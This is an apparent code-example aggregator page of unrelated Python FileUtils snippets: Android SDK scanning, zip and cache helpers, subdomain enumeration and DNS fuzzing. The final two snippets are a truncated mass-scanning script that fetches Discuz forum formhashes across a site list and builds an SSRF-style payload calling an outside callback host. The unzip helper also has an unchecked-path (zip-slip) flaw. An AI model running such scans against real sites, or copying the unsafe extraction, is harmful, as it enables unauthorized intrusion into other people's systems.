Exemplo n.º 1
0
    def smali_decompile(self, jar_path):
        dx_path = os.path.join(config.TOOL_PATH, "dx.jar")
        dex_path = os.path.join(config.unzip_path, "classes.dex")
        baksmali_jar_path = os.path.join(config.TOOL_PATH, "baksmali.jar")

        process = subprocess.Popen(
            ["java", "-jar", dx_path, "--dex", "--output", dex_path, jar_path],
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT)
        process.communicate()

        if FileUtils.is_file_exit(dex_path):
            try:
                command = 'java -jar \"%s\" -o \"%s\" \"%s\"' % (
                    baksmali_jar_path, config.smali_path, dex_path)
                p = subprocess.Popen(command,
                                     stdin=subprocess.PIPE,
                                     stdout=subprocess.PIPE,
                                     stderr=subprocess.PIPE,
                                     shell=True)
                ret = p.communicate()
                if FileUtils.is_dir_empty(config.smali_path):
                    logging.error(u"反编译smali失败")
                    return False
            except Exception as e:
                logging.error(u"反编译smali失败,原因:%s", e)
                return False

        return True
Exemplo n.º 2
0
 def zip_subdirs(from_dir, to_dir):
     logger.info('zip_subdirs {} -> {}'.format(from_dir, to_dir))
     FileUtils.create_dir(to_dir)
     for dir in FileUtils.listdir_nohidden(from_dir):
         logger.info('zip dir: {}'.format(dir))
         ZipUtils.zip_dir('{}/{}'.format(from_dir, dir),
                          '{}/{}.zip'.format(to_dir, dir))
Exemplo n.º 3
0
    def unzip(file_path, dst_path):
        if not zipfile.is_zipfile(file_path):
            return False

        if not os.path.exists(dst_path):
            os.mkdir(dst_path, 0o777)

        zfobj = zipfile.ZipFile(file_path)
        for name in zfobj.namelist():
            oriname = name
            if os.sep == '\\':
                name = name.replace('/', os.sep)
            if name.endswith(os.sep):
                FileUtils.create_dir(os.path.join(dst_path, name))
                pass
            else:
                filepath = os.path.join(dst_path, name)
                dir = os.path.dirname(filepath)

                if not os.path.exists(dir):
                    FileUtils.create_dir(dir)

                file = open(filepath, 'wb')
                file.write(zfobj.read(oriname))
                file.close()

        return True
 def zip_all_libs_to_cache(self):
     os.system('rm -rf ' + self.cache_libs_path + '/*')
     FileUtils.create_dir(self.cache_libs_path)
     for dir in FileUtils.listdir_nohidden(self.generated_path):
         ZipUtils.zip_dir(self.generated_path + '/' + dir,
                          self.cache_libs_path + '/' + dir + '.zip')
     FileUtils.copy_file_or_dir(self.prebuild_path + self.manifest_file,
                                self.cache_path)
Exemplo n.º 5
0
    def start(self):
        # 准备工作,解压反编译
        logging.info("start sdk scan..")
        if not FileUtils.is_file_exit(self.sdk_path):
            logging.error("sdk文件不存在")
            return
        pix = os.path.splitext(self.sdk_path)[1]

        if not pix == '.aar' and not pix == '.jar':
            logging.error("sdk文件格式错误")
            return

        sdkinfo.sdk_path = self.sdk_path

        is_aar = pix == '.aar'
        if is_aar:
            logging.info("start unzip..")
            if not ZipUtils.unzip(sdkinfo.sdk_path, config.unzip_path):
                logging.error("unzip error")
                return

            config.jar_path = os.path.join(config.unzip_path, "classes.jar")
            config.res_path = os.path.join(config.unzip_path, "res")
            config.xml_path = os.path.join(config.unzip_path,
                                           "AndroidManifest.xml")
            config.jni_path = os.path.join(config.unzip_path, "jni")
            config.assets_path = os.path.join(config.unzip_path, "assets")
            config.libs_path = os.path.join(config.unzip_path, "libs")

            if not FileUtils.is_file_exit(
                    config.jar_path) or not FileUtils.is_file_exit(
                        config.xml_path):
                logging.info("unzip fail,no jar or xml file.")
                return
            logging.info("unzip success.")
        else:
            config.jar_path = os.path.join(config.unzip_path, "classes.jar")
            shutil.copy(config.sdk_path, config.jar_path)

        logging.info("start decompile java.")
        count = self.get_class_file(config.jar_path)
        if self.cfr_decompile(config.jar_path, count):
            logging.info("decompile java success.")
        else:
            logging.info("decompile java error.")

        logging.info("start decompile smali.")
        if self.smali_decompile(config.jar_path):
            logging.info("decompile smali success.")
        else:
            logging.info("decompile smali error.")

        self.scan(is_aar)
Exemplo n.º 6
0
    def scan(self):
        if not FileUtils.is_file_exit(config.POLICY_PERMISSION_PATH):
            logging.error("POLICY_TXT not in.")
            return

        if FileUtils.is_file_exit(config.xml_path):
            self.find_permission_policy()
            if int(sdkinfo.target_sdk_version) < 28:
                self.target_sdk = True
        else:
            logging.info("no xml")

        self.so_policy()

        self.find_api_policy()
Exemplo n.º 7
0
    def get_info(self):
        sdkinfo.sdk_name = os.path.splitext(os.path.basename(
            sdkinfo.sdk_path))[0]
        sdkinfo.sdk_size = str(int(os.path.getsize(sdkinfo.sdk_path) / 1024))
        if not FileUtils.is_file_exit(config.xml_path):
            return

        with open(config.xml_path, 'r', encoding='utf-8') as file:
            lines = file.readlines()
            for line in lines:
                if line.find('package=') > -1:
                    re_name = re.compile(r"package=\"(.*?)\"\s")
                    sdkinfo.package_name = re_name.findall(line)[0]
                if line.find('versionName') > -1:
                    re_version = re.compile(r"versionName=\"(.*?)\"\s")
                    sdkinfo.version_name = re_version.findall(line)[0]
                if line.find('uses-permission') > -1:
                    re_per = re.compile(r"android:name=\"(.*?)\"\s")
                    permission = re_per.findall(line)[0]
                    sdkinfo.permissions.append(permission)
                if line.find('minSdkVersion') > -1:
                    re_min = re.compile(r"android:minSdkVersion=\"(.*?)\"\s")
                    sdkinfo.min_sdk_version = re_min.findall(line)[0]
                if line.find('targetSdkVersion') > -1:
                    re_target = re.compile(
                        r"android:targetSdkVersion=\"(.*?)\"\s")
                    sdkinfo.target_sdk_version = re_target.findall(line)[0]
                if line.find("android:allowBackup") > -1:
                    re_allow = re.compile(r"android:allowBackup=\"(.*?)\"\s")
                    sdkinfo.allow_back_up = re_allow.findall(
                        line)[0].lower() == "true"
                if line.find("android:debuggable") > -1:
                    re_debug = re.compile(r"android:debuggable=\"(.*?)\"\s")
                    sdkinfo.debuggable = re_debug.findall(
                        line)[0].lower() == "true"
Exemplo n.º 8
0
def save_result(filename, args):
    if FileUtils.exists(filename):
        try:
            fd = open(filename, 'w')
            json.dump(args, fd, indent=4)
        finally:
            fd.close()
Exemplo n.º 9
0
def read_json(filename):
    if FileUtils.exists(filename):
        try:
            fd = open(filename, 'r')
            args = json.load(fd)
            return args
        finally:
            fd.close()
    else:
        return []
Exemplo n.º 10
0
 def scan(self, path):
     '''扫描目录'''
     files = FileUtils.getFiles(path)
     fileCount = len(files)
     result = {}
     result['fileCount'] = fileCount
     scanResult = []
     for filePath in files:
         sr = self.scanFile(filePath)
         if sr:
             scanResult.append(sr)
     result['data'] = scanResult    
     return result
Exemplo n.º 11
0
    def prebuild_if_needed(self, push=True):
        self.fetch_and_apply_cache()
        subprocess.run(['bundle', 'exec', 'pod', 'install'], check=True)
        # Sync with cache directory

        if not os.path.isfile(self.delta_path):
            logger.info('No change in prebuilt frameworks')
            return
        try:
            with open(self.delta_path) as f:
                FileUtils.create_dir(self.cache_path)
                data = f.read()
                data = re.sub('"', '', data)
                updatedMatches = re.findall(r'Updated: \[(.*)\]', data)
                if updatedMatches:
                    updated = updatedMatches[0].strip()
                    logger.info("Updated frameworks: {}".format(updated))
                    if len(updated):
                        libs = updated.split(',')
                        for lib in libs:
                            libName = lib.strip()
                            self.clean_cache(libName)
                            self.zip_to_cache(libName)

                deletedMatches = re.findall(r'Deleted: \[(.*)\]', data)
                if deletedMatches:
                    deleted = deletedMatches[0].strip()
                    logger.info('Deleted frameworks: {}'.format(deleted))
                    if len(deleted):
                        libs = deleted.split(',')
                        for lib in libs:
                            self.clean_cache(lib.strip())
                # Copy manifest file
                FileUtils.copy_file_or_dir(
                    self.prebuild_path + self.manifest_file, self.cache_path)
                if push:
                    self.push_all_to_git(self.cache_path)
        except Exception as e:
            raise e
Exemplo n.º 12
0
 def unzip_cache(self):
     logger.info(f'Unzip cache, from {self.cache_libs_path} to {self.generated_path}')
     with step('unzip_prebuild_libs'):
         FileUtils.remove_dir(self.prebuild_path)
         FileUtils.create_dir(self.generated_path)
         FileUtils.copy_file_or_dir(os.path.join(self.cache_path, self.manifest_file), self.prebuild_path)
         # Unzip libs to pod-binary folder
         for zip_path in glob.iglob(os.path.join(self.cache_libs_path, '*.zip')):
             ZipUtils.unzip(zip_path, self.generated_path)
Exemplo n.º 13
0
 def unzip_cache(self):
     with step('unzip_prebuild_libs'):
         FileUtils.remove_dir(self.prebuild_path)
         FileUtils.create_dir(self.generated_path)
         FileUtils.copy_file_or_dir(self.cache_path + self.manifest_file,
                                    self.prebuild_path)
         # Unzip libs to pod-binary folder
         for zipPath in glob.iglob(self.cache_libs_path + '/*.zip'):
             ZipUtils.unzip(zipPath, self.generated_path)
 def __init__(self, target, dict_file='domain.csv'):
     super(DomainFuzzer, self).__init__()
     self.target = target
     self.dict = FileUtils.getLines(dict_file)
     self.nameservers = [
                 '114.114.114.114',
                 '119.29.29.29',
                 '223.5.5.5',
                 '8.8.8.8',
                 '182.254.116.116',
                 '223.6.6.6',
                 '8.8.4.4',
                 '180.76.76.76',
                 '216.146.35.35',
                 '123.125.81.6',
                 '218.30.118.6',]
     self.resolver = Domain(self.nameservers, timeout=5)
Exemplo n.º 15
0
 def so_policy(self):
     if FileUtils.is_dir_exit(config.jni_path):
         arm_64 = os.path.join(config.jni_path, "arm64-v8a")
         x86_64 = os.path.join(config.jni_path, "x86_64")
         if not FileUtils.is_dir_exit(arm_64) and not FileUtils.is_dir_exit(
                 x86_64):
             self.so_64 = True
     else:
         if FileUtils.is_dir_exit(config.unzip_path):
             arm_64_2 = os.path.join(config.unzip_path, "arm64-v8a")
             x86_64_2 = os.path.join(config.unzip_path, "x86_64")
             self.so_64 = FileUtils.is_dir_empty(
                 arm_64_2) and FileUtils.is_dir_empty(x86_64_2)
Exemplo n.º 16
0
 def test_decrypt_file(self):
     content = FileUtils.read_all_data(
         '/Users/apple/PycharmProjects/workspace/axf_library/library/utils/tests/J_CBIB0020_AXF_20180605.zip')
     # content = base64.decodestring(content)
     # print content
     # print b2a_hex(content)
     key = '132e8a57b4f6139b3a5de9g4'
     # Des3FileUtils.encrypt_file("/Users/apple/liaoshanqing/tmp/test_file_crypt.txt",
     #                            '/Users/apple/liaoshanqing/tmp/test_file_crypt_1.txt', 8192, key, iv)
     # Des3FileUtils.decrypt_file('./IMGDOC0001_AWX_20170724_0002.zip',
     #                            './axf_test.zip', 8192, key)
     des3 = DES3.new(key, DES3.MODE_ECB)
     with open('./1.txt', 'wb') as out_file:
         result = des3.decrypt(content)
         # print result
         # result = base64.decodestring(result)
         # print result.decode('gbk')
         # print b2a_hex(result)
         out_file.write(result)
     print 'ok'
Exemplo n.º 17
0
 def delete(self):
     FileUtils.delete_dirs(config.temp_path)
Exemplo n.º 18
0
def run(args):
    domain = args.domain
    outfile = args.out

    if not domain:
        print('usage: wydomain.py -d aliyun.com')
        sys.exit(1)

    # init _cache_path
    script_path = os.path.dirname(os.path.abspath(__file__))
    _cache_path = os.path.join(script_path, 'result/{0}'.format(domain))
    if not os.path.exists(_cache_path):
        os.makedirs(_cache_path, 0777)

    # alexa result json file
    logging.info("starting alexa fetcher...")
    _cache_file = os.path.join(_cache_path, 'alexa.json')
    result = Alexa(domain=domain).run()
    save_result(_cache_file, result)
    logging.info("alexa fetcher subdomains({0}) successfully...".format(len(result)))

    # threatminer result json file
    logging.info("starting threatminer fetcher...")
    _cache_file = os.path.join(_cache_path, 'threatminer.json')
    result = Threatminer(domain=domain).run()
    save_result(_cache_file, result)
    logging.info("threatminer fetcher subdomains({0}) successfully...".format(len(result)))

    # threatcrowd result json file
    logging.info("starting threatcrowd fetcher...")
    _cache_file = os.path.join(_cache_path, 'threatcrowd.json')
    result = Threatcrowd(domain=domain).run()
    save_result(_cache_file, result)
    logging.info("threatcrowd fetcher subdomains({0}) successfully...".format(len(result)))

    # sitedossier result json file
    logging.info("starting sitedossier fetcher...")
    _cache_file = os.path.join(_cache_path, 'sitedossier.json')
    result = Sitedossier(domain=domain).run()
    save_result(_cache_file, result)
    logging.info("sitedossier fetcher subdomains({0}) successfully...".format(len(result)))

    # netcraft result json file
    logging.info("starting netcraft fetcher...")
    _cache_file = os.path.join(_cache_path, 'netcraft.json')
    result = Netcraft(domain=domain).run()
    save_result(_cache_file, result)
    logging.info("netcraft fetcher subdomains({0}) successfully...".format(len(result)))

    # ilinks result json file
    logging.info("starting ilinks fetcher...")
    _cache_file = os.path.join(_cache_path, 'ilinks.json')
    result = Ilinks(domain=domain).run()
    save_result(_cache_file, result)
    logging.info("ilinks fetcher subdomains({0}) successfully...".format(len(result)))

    # chaxunla result json file
    logging.info("starting chaxunla fetcher...")
    _cache_file = os.path.join(_cache_path, 'chaxunla.json')
    result = Chaxunla(domain=domain).run()
    save_result(_cache_file, result)
    logging.info("chaxunla fetcher subdomains({0}) successfully...".format(len(result)))

    # google TransparencyReport result json file
    logging.info("starting google TransparencyReport fetcher...")
    result = TransparencyReport(domain=domain).run()
    _cache_file = os.path.join(_cache_path, 'googlect_subject.json')
    save_result(_cache_file, result.get('subjects'))
    _cache_file = os.path.join(_cache_path, 'googlect_dnsnames.json')
    save_result(_cache_file, result.get('dns_names'))
    logging.info("google TransparencyReport fetcher subdomains({0}) successfully...".format(len(result.get('dns_names'))))

    # Collection API Subdomains
    sub_files = [
        'alexa.json', 
        'chaxunla.json', 
        'ilinks.json', 
        'netcraft.json', 
        'sitedossier.json',
        'threatcrowd.json',
        'threatminer.json']

    # process all cache files
    subdomains = []
    for file in sub_files:
        _cache_file = os.path.join(_cache_path, file)
        json_data = read_json(_cache_file)
        if json_data:
            subdomains.extend(json_data)

    # process openssl x509 dns_names
    _cache_file = os.path.join(_cache_path, 'googlect_dnsnames.json')
    json_data = read_json(_cache_file)
    for sub in json_data:
        if sub.endswith(domain):
            subdomains.append(sub)

    # collection burte force subdomains
    _burte_file = os.path.join(_cache_path, 'dnsburte.json')
    if FileUtils.exists(_burte_file):
        json_data = read_json(_burte_file)
        if json_data:
            subdomains.extend(json_data)

    # save all subdomains to outfile
    subdomains = list(set(subdomains))
    _result_file = os.path.join(script_path, outfile)
    save_result(_result_file, subdomains)
    logging.info("{0} {1} subdomains save to {2}".format(
        domain, len(subdomains), _result_file))
def run(args):
    domain = args.domain
    outfile = args.domain + '_wy.txt'

    if not domain:
        print('usage: wydomain.py -d aliyun.com')
        sys.exit(1)

    # init _cache_path
    script_path = os.path.dirname(os.path.abspath(__file__))
    _cache_path = os.path.join(script_path, 'result/{0}'.format(domain))
    if not os.path.exists(_cache_path):
        os.makedirs(_cache_path, 0777)

    # alexa result json file
    logging.info("starting alexa fetcher...")
    _cache_file = os.path.join(_cache_path, 'alexa.json')
    result = Alexa(domain=domain).run()
    save_result(_cache_file, result)
    logging.info("alexa fetcher subdomains({0}) successfully...".format(len(result)))

    # threatminer result json file
    logging.info("starting threatminer fetcher...")
    _cache_file = os.path.join(_cache_path, 'threatminer.json')
    result = Threatminer(domain=domain).run()
    save_result(_cache_file, result)
    logging.info("threatminer fetcher subdomains({0}) successfully...".format(len(result)))

    # threatcrowd result json file
    logging.info("starting threatcrowd fetcher...")
    _cache_file = os.path.join(_cache_path, 'threatcrowd.json')
    result = Threatcrowd(domain=domain).run()
    save_result(_cache_file, result)
    logging.info("threatcrowd fetcher subdomains({0}) successfully...".format(len(result)))

    # sitedossier result json file
    logging.info("starting sitedossier fetcher...")
    _cache_file = os.path.join(_cache_path, 'sitedossier.json')
    result = Sitedossier(domain=domain).run()
    save_result(_cache_file, result)
    logging.info("sitedossier fetcher subdomains({0}) successfully...".format(len(result)))

    # netcraft result json file
    logging.info("starting netcraft fetcher...")
    _cache_file = os.path.join(_cache_path, 'netcraft.json')
    result = Netcraft(domain=domain).run()
    save_result(_cache_file, result)
    logging.info("netcraft fetcher subdomains({0}) successfully...".format(len(result)))

    # ilinks result json file
    logging.info("starting ilinks fetcher...")
    _cache_file = os.path.join(_cache_path, 'ilinks.json')
    result = Ilinks(domain=domain).run()
    save_result(_cache_file, result)
    logging.info("ilinks fetcher subdomains({0}) successfully...".format(len(result)))

    # chaxunla result json file
    logging.info("starting chaxunla fetcher...")
    _cache_file = os.path.join(_cache_path, 'chaxunla.json')
    result = Chaxunla(domain=domain).run()
    save_result(_cache_file, result)
    logging.info("chaxunla fetcher subdomains({0}) successfully...".format(len(result)))

    # google TransparencyReport result json file
    logging.info("starting google TransparencyReport fetcher...")
    result = TransparencyReport(domain=domain).run()
    _cache_file = os.path.join(_cache_path, 'googlect_subject.json')
    save_result(_cache_file, result.get('subjects'))
    _cache_file = os.path.join(_cache_path, 'googlect_dnsnames.json')
    save_result(_cache_file, result.get('dns_names'))
    logging.info("google TransparencyReport fetcher subdomains({0}) successfully...".format(len(result.get('dns_names'))))

    # Collection API Subdomains
    sub_files = [
        'alexa.json', 
        'chaxunla.json', 
        'ilinks.json', 
        'netcraft.json', 
        'sitedossier.json',
        'threatcrowd.json',
        'threatminer.json']

    # process all cache files
    subdomains = []
    for file in sub_files:
        _cache_file = os.path.join(_cache_path, file)
        json_data = read_json(_cache_file)
        if json_data:
            subdomains.extend(json_data)

    # process openssl x509 dns_names
    _cache_file = os.path.join(_cache_path, 'googlect_dnsnames.json')
    json_data = read_json(_cache_file)
    for sub in json_data:
        if sub.endswith(domain):
            subdomains.append(sub)

    # collection burte force subdomains
    _burte_file = os.path.join(_cache_path, 'dnsburte.json')
    if FileUtils.exists(_burte_file):
        json_data = read_json(_burte_file)
        if json_data:
            subdomains.extend(json_data)

    # save all subdomains to outfile
    subdomains = list(set(subdomains))
    _result_file = os.path.join(script_path, outfile)
    save_result(_result_file, subdomains)
    logging.info("{0} {1} subdomains save to {2}".format(
        domain, len(subdomains), _result_file))
Exemplo n.º 20
0
 def __init__(self, target, dict_file='domain.csv', timeout=5):
     self.target = target
     self.dict = FileUtils.getLines(dict_file)
     self.resolver = Domain(timeout=timeout)
Exemplo n.º 21
0
 def get_assets(self):
     if FileUtils.is_file_exit(config.assets_path):
         for home, dir, filenames in os.walk(config.libs_path):
             for filename in filenames:
                 sdkinfo.assets_files.append(filename)
Exemplo n.º 22
0
 def get_soname(self):
     if FileUtils.is_file_exit(config.jni_path):
         for dirpath, dirnames, filenames in os.walk(config.unzip_path):
             for filename in filenames:
                 if filename.endswith(".so"):
                     sdkinfo.sdk_soname = filename
Exemplo n.º 23
0
 def clean_cache(self, lib):
     lib_path = os.path.join(self.cache_libs_path, f'{lib}.zip')
     logger.info(f'Clean cache of {lib} at {lib_path}')
     FileUtils.remove_file(lib_path)
Exemplo n.º 24
0
 def clean_cache(self, libName):
     FileUtils.remove_file(self.cache_libs_path + libName + ".zip")


import requests

from utils.fileutils import FileUtils



import requests.packages.urllib3

requests.packages.urllib3.disable_warnings()



for website in FileUtils.getLines('qqdz.lst'):

    request = requests.session()

    try:

        forumurl = "{website}/forum.php".format(website=website)

        response = request.get(forumurl, timeout=5, verify=False)

        formhash = re.findall(r'formhash" value="(.*?)"',response.content)

        netloc = urlparse.urlparse(website).netloc

        payload = 'http://fuzz.wuyun.com/404.php?s={netloc}.jpg'.format(netloc=netloc)
Exemplo n.º 26
0
import random

import time

import re

import requests

from utils.fileutils import FileUtils

import requests.packages.urllib3

requests.packages.urllib3.disable_warnings()

for website in FileUtils.getLines('qqdz.lst'):

    request = requests.session()

    try:

        forumurl = "{website}/forum.php".format(website=website)

        response = request.get(forumurl, timeout=5, verify=False)

        formhash = re.findall(r'formhash" value="(.*?)"', response.content)

        netloc = urlparse.urlparse(website).netloc

        payload = 'http://fuzz.wuyun.com/404.php?s={netloc}.jpg'.format(
            netloc=netloc)